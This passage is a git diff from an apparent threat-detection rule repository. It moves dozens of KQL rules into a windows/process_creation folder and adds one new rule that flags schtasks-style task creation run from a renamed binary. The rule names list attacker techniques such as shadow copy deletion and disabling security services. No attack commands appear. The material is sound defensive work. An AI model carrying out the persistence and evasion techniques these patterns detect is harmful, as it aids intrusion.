similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql rename to KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql diff --git a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql rename to KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql diff --git a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql similarity index 100% rename from KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql rename to KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql diff --git a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql similarity index 100% rename from KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql rename to KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql diff --git a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql similarity index 100% rename from KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql rename to KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql diff --git a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql rename to KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql diff --git a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql similarity index 100% rename from KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql rename to KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql diff --git a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql rename to KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql diff --git a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql b/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql rename to KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql diff --git a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql similarity index 100% rename from KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql diff --git a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql similarity index 100% rename from KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql b/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql rename to KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql diff --git a/KQL/rules/Execution/renamed_curl_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql similarity index 100% rename from KQL/rules/Execution/renamed_curl_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql diff --git a/KQL/rules/Execution/renamed_ftp_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql similarity index 100% rename from KQL/rules/Execution/renamed_ftp_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql diff --git a/KQL/rules/Impact/renamed_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql similarity index 100% rename from KQL/rules/Impact/renamed_gpg_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql diff --git a/KQL/rules/Execution/renamed_jusched_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql similarity index 100% rename from KQL/rules/Execution/renamed_jusched_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql b/KQL/rules/windows/process_creation/renamed_megasync_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_megasync_execution.kql rename to KQL/rules/windows/process_creation/renamed_megasync_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql b/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql rename to KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql diff --git a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql similarity index 100% rename from KQL/rules/Execution/renamed_nircmd_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_office_binary_execution.kql rename to KQL/rules/windows/process_creation/renamed_office_binary_execution.kql diff --git a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql similarity index 100% rename from KQL/rules/Execution/renamed_pingcastle_binary_execution.kql rename to KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_plink_execution.kql b/KQL/rules/windows/process_creation/renamed_plink_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_plink_execution.kql rename to KQL/rules/windows/process_creation/renamed_plink_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/windows/process_creation/renamed_procdump_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_procdump_execution.kql rename to KQL/rules/windows/process_creation/renamed_procdump_execution.kql diff --git a/KQL/rules/Execution/renamed_psexec_service_execution.kql b/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql similarity index 100% rename from KQL/rules/Execution/renamed_psexec_service_execution.kql rename to KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql diff --git a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql rename to KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql diff --git a/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql new file mode 100644 index 00000000..60fe47ba --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql @@ -0,0 +1,14 @@ +// Title: Renamed Schtasks Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-27 +// Level: high +// Description: Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks. +// One of the very common persistence techniques is schedule malicious tasks using schtasks.exe. +// Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1036.003, attack.t1053.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains " -tn " or ProcessCommandLine contains " /tn " or ProcessCommandLine contains " –tn " or ProcessCommandLine contains " —tn " or ProcessCommandLine contains " ―tn " or ProcessCommandLine contains " -tr " or ProcessCommandLine contains " /tr " or ProcessCommandLine contains " –tr " or ProcessCommandLine contains " —tr " or ProcessCommandLine contains " ―tr " or ProcessCommandLine contains " -sc " or ProcessCommandLine contains " /sc " or ProcessCommandLine contains " –sc " or ProcessCommandLine contains " —sc " or ProcessCommandLine contains " ―sc " or ProcessCommandLine contains " -st " or ProcessCommandLine contains " /st " or ProcessCommandLine contains " –st " or ProcessCommandLine contains " —st " or ProcessCommandLine contains " ―st " or ProcessCommandLine contains " -ru " or ProcessCommandLine contains " /ru " or ProcessCommandLine contains " –ru " or ProcessCommandLine contains " —ru " or ProcessCommandLine contains " ―ru " or ProcessCommandLine contains " -fo " or ProcessCommandLine contains " /fo " or ProcessCommandLine contains " –fo " or ProcessCommandLine contains " —fo " or ProcessCommandLine contains " ―fo ") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create " or ProcessCommandLine contains " -delete " or ProcessCommandLine contains " /delete " or ProcessCommandLine contains " –delete " or ProcessCommandLine contains " —delete " or ProcessCommandLine contains " ―delete " or ProcessCommandLine contains " -query " or ProcessCommandLine contains " /query " or ProcessCommandLine contains " –query " or ProcessCommandLine contains " —query " or ProcessCommandLine contains " ―query " or ProcessCommandLine contains " -change " or ProcessCommandLine contains " /change " or ProcessCommandLine contains " –change " or ProcessCommandLine contains " —change " or ProcessCommandLine contains " ―change " or ProcessCommandLine contains " -run " or ProcessCommandLine contains " /run " or ProcessCommandLine contains " –run " or ProcessCommandLine contains " —run " or ProcessCommandLine contains " ―run " or ProcessCommandLine contains " -end " or ProcessCommandLine contains " /end " or ProcessCommandLine contains " –end " or ProcessCommandLine contains " —end " or ProcessCommandLine contains " ―end ")) and (not(ProcessCommandLine contains "schtasks"))) or (ProcessVersionInfoOriginalFileName =~ "schtasks.exe" and (not(FolderPath endswith "\\schtasks.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql similarity index 100% rename from KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql rename to KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql diff --git a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql similarity index 100% rename from KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql rename to KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql diff --git a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql similarity index 100% rename from KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql rename to KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql diff --git a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql rename to KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql diff --git a/KQL/rules/Discovery/renamed_whoami_execution.kql b/KQL/rules/windows/process_creation/renamed_whoami_execution.kql similarity index 100% rename from KQL/rules/Discovery/renamed_whoami_execution.kql rename to KQL/rules/windows/process_creation/renamed_whoami_execution.kql diff --git a/KQL/rules/Command and Control/replace_exe_usage.kql b/KQL/rules/windows/process_creation/replace_exe_usage.kql similarity index 100% rename from KQL/rules/Command and Control/replace_exe_usage.kql rename to KQL/rules/windows/process_creation/replace_exe_usage.kql diff --git a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql similarity index 100% rename from KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql rename to KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql diff --git a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql b/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql rename to KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql diff --git a/KQL/rules/Execution/ruby_inline_command_execution.kql b/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql similarity index 100% rename from KQL/rules/Execution/ruby_inline_command_execution.kql rename to KQL/rules/windows/process_creation/ruby_inline_command_execution.kql diff --git a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql similarity index 100% rename from KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql rename to KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql similarity index 100% rename from KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql rename to KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql similarity index 100% rename from KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql rename to KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql diff --git a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql rename to KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql diff --git a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql rename to KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql diff --git a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql similarity index 100% rename from KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql rename to KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql diff --git a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql b/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql rename to KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql diff --git a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql b/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql similarity index 100% rename from KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql rename to KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql diff --git a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql rename to KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql diff --git a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql b/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql rename to KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql diff --git a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql b/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql rename to KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql similarity index 100% rename from KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql rename to KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql diff --git a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql rename to KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql diff --git a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql rename to KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql similarity index 100% rename from KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql rename to KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql diff --git a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql similarity index 100% rename from KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql rename to KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql similarity index 100% rename from KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql rename to KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql rename to KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql similarity index 100% rename from KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql rename to KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql diff --git a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql similarity index 100% rename from KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql rename to KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql diff --git a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql b/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql similarity index 100% rename from KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql rename to KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql diff --git a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql b/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql similarity index 100% rename from KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql rename to KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql diff --git a/KQL/rules/Execution/script_event_consumer_spawning_process.kql b/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql similarity index 100% rename from KQL/rules/Execution/script_event_consumer_spawning_process.kql rename to KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql diff --git a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql similarity index 100% rename from KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql rename to KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql diff --git a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql similarity index 100% rename from KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql rename to KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql diff --git a/KQL/rules/Defense Evasion/sdclt_child_processes.kql b/KQL/rules/windows/process_creation/sdclt_child_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/sdclt_child_processes.kql rename to KQL/rules/windows/process_creation/sdclt_child_processes.kql diff --git a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql similarity index 100% rename from KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql rename to KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql diff --git a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql rename to KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql diff --git a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql rename to KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql rename to KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql similarity index 100% rename from KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql rename to KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql diff --git a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql similarity index 100% rename from KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql rename to KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql rename to KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql diff --git a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql similarity index 100% rename from KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql rename to KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql diff --git a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql diff --git a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql similarity index 100% rename from KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql rename to KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql diff --git a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql similarity index 100% rename from KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql rename to KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql rename to KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql similarity index 100% rename from KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql rename to KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql diff --git a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql similarity index 100% rename from KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql rename to KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql diff --git a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql similarity index 100% rename from KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql rename to KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql diff --git 